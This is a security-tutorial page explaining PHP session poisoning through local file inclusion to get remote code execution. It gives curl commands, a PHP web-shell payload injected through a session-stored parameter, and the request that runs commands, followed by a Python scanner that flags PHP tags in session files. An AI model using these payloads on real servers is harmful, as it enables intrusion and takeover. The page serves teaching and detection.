PRIMARY CATEGORY → WEB ATTACKS
| REFERENCES | |
|---|---|
| PHP Session Poisoning using LFI | See here |
PHP Session Poisoning - LFI to RCE
This attack vector requires writing PHP code into a field we control whose value the remote machine writes to a file (a log file, or here a session file)
Then, that file is included through the LFI in order to execute the PHP code
For this attack to work, the user running the PHP or Apache process must have read privileges over the written files
PHP Session Poisoning works by poisoning a value stored in the server-side session file that the PHPSESSID cookie identifies
System Path of PHPSESSID Details
Related PHP Directive → session.save_path
The details of PHPSESSID cookies are stored in session files on the back-end
Windows
C:\Windows\Temp\sess_<PHPSESSID_VALUE>
Linux
/var/lib/php/sessions/sess_<PHPSESSID_VALUE>
Exploitation
Extracting the PHPSESSID Value
curl --silent --request GET --location --head '<URL>' |& grep -i -- 'PHPSESSID'
Use the LFI to examine the PHPSESSID File Content
curl --silent --request GET --location 'http://domain.tld/home.php?file=/var/lib/php/sessions/sess_<PHPSESSID_VALUE>'
Poisoning Cookie’s Data controlled by the User
Next, check if any data in the session file is under your control, i.e. if it can be modified by the user
- Example I
When a user logs into a Web Application, the user’s name appears as a field within the session file of the cookie
- Example II
The session file may contain a language value which is controlled by the GET parameter ?language=<VALUE>
Writing PHP Code to the Session File through the controlled data
Therefore, an attacker could register a user whose name contains PHP code and point to the session file through the LFI. This PHP code will be executed
The same applies to the URL parameter case: if a URL parameter's value is stored in the session file tied to the user's cookie, poison that parameter by writing PHP code as its value
curl --silent --location --request GET 'http[s]://domain.tld/index.php?language=<?php system($_GET["cmd"]);?>' # the PHP payload must be URL-encoded when sent
Including the Session File using the LFI - Executing Commands through the Injected PHP Code
curl --silent --location --request GET 'http[s]://domain.tld/home.php?file=/var/lib/php/sessions/sess_<PHPSESSID_VALUE>&cmd=<COMMAND>'
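Detection side, as an added example that is not part of the original notes: session files written by PHP's default serialize handler hold one `key|<php-serialized value>` record per session variable, so a defender can parse every `sess_*` file under session.save_path and flag any session variable (the username or language values above, for instance) that carries a PHP open tag. The file format handling, the latin-1 read (PHP string lengths are byte counts) and the sample records are assumptions of this example.

```python
"""Scan PHP session files (php serialize handler) for injected PHP open tags."""
import re
from pathlib import Path

# Matches "<?php" and the short echo tag "<?=", case-insensitively
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)

def parse_value(data: str, pos: int):
    """Parse one php-serialized value starting at pos; return (value, next_pos)."""
    t = data[pos]
    if t == "N":                                   # N;
        return None, pos + 2
    if t in "ibd":                                 # i:3;  b:1;  d:1.5;
        end = data.index(";", pos)
        raw = data[pos + 2:end]
        return {"i": int, "b": lambda x: x == "1", "d": float}[t](raw), end + 1
    if t == "s":                                   # s:<byte length>:"<bytes>";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                          # skip ':"'
        return data[start:start + length], start + length + 2   # skip '";'
    if t == "a":                                   # a:<count>:{<key><value>...}
        colon = data.index(":", pos + 2)
        count, p, out = int(data[pos + 2:colon]), colon + 2, {}
        for _ in range(count):
            k, p = parse_value(data, p)
            out[k], p = parse_value(data, p)
        return out, p + 1                          # skip closing '}'
    raise ValueError(f"unsupported serialized type {t!r} at offset {pos}")

def parse_session(data: str) -> dict:
    """Split a session file into {variable: value} records ('key|value' pairs)."""
    result, pos = {}, 0
    while pos < len(data):
        bar = data.index("|", pos)
        result[data[pos:bar]], pos = parse_value(data, bar + 1)
    return result

def poisoned_keys(data: str) -> list:
    """Return session variables whose (possibly nested) values contain a PHP tag."""
    def walk(v):
        if isinstance(v, dict):
            return any(walk(x) for x in v.values())
        return isinstance(v, str) and bool(PHP_TAG.search(v))
    return [k for k, v in parse_session(data).items() if walk(v)]

def scan_session_dir(path: str) -> dict:
    """Map each sess_* file under path (e.g. session.save_path) to its poisoned keys."""
    return {f.name: poisoned_keys(f.read_text(encoding="latin-1"))
            for f in Path(path).glob("sess_*")}

# Constructed sample records: a clean session and one with a poisoned language value
CLEAN = 'username|s:5:"admin";language|s:2:"en";visits|i:3;'
POISONED = 'username|s:5:"admin";language|s:15:"<?php echo 1;?>";'
```

Run `scan_session_dir("/var/lib/php/sessions")` as a user that can read the directory and alert on any non-empty list.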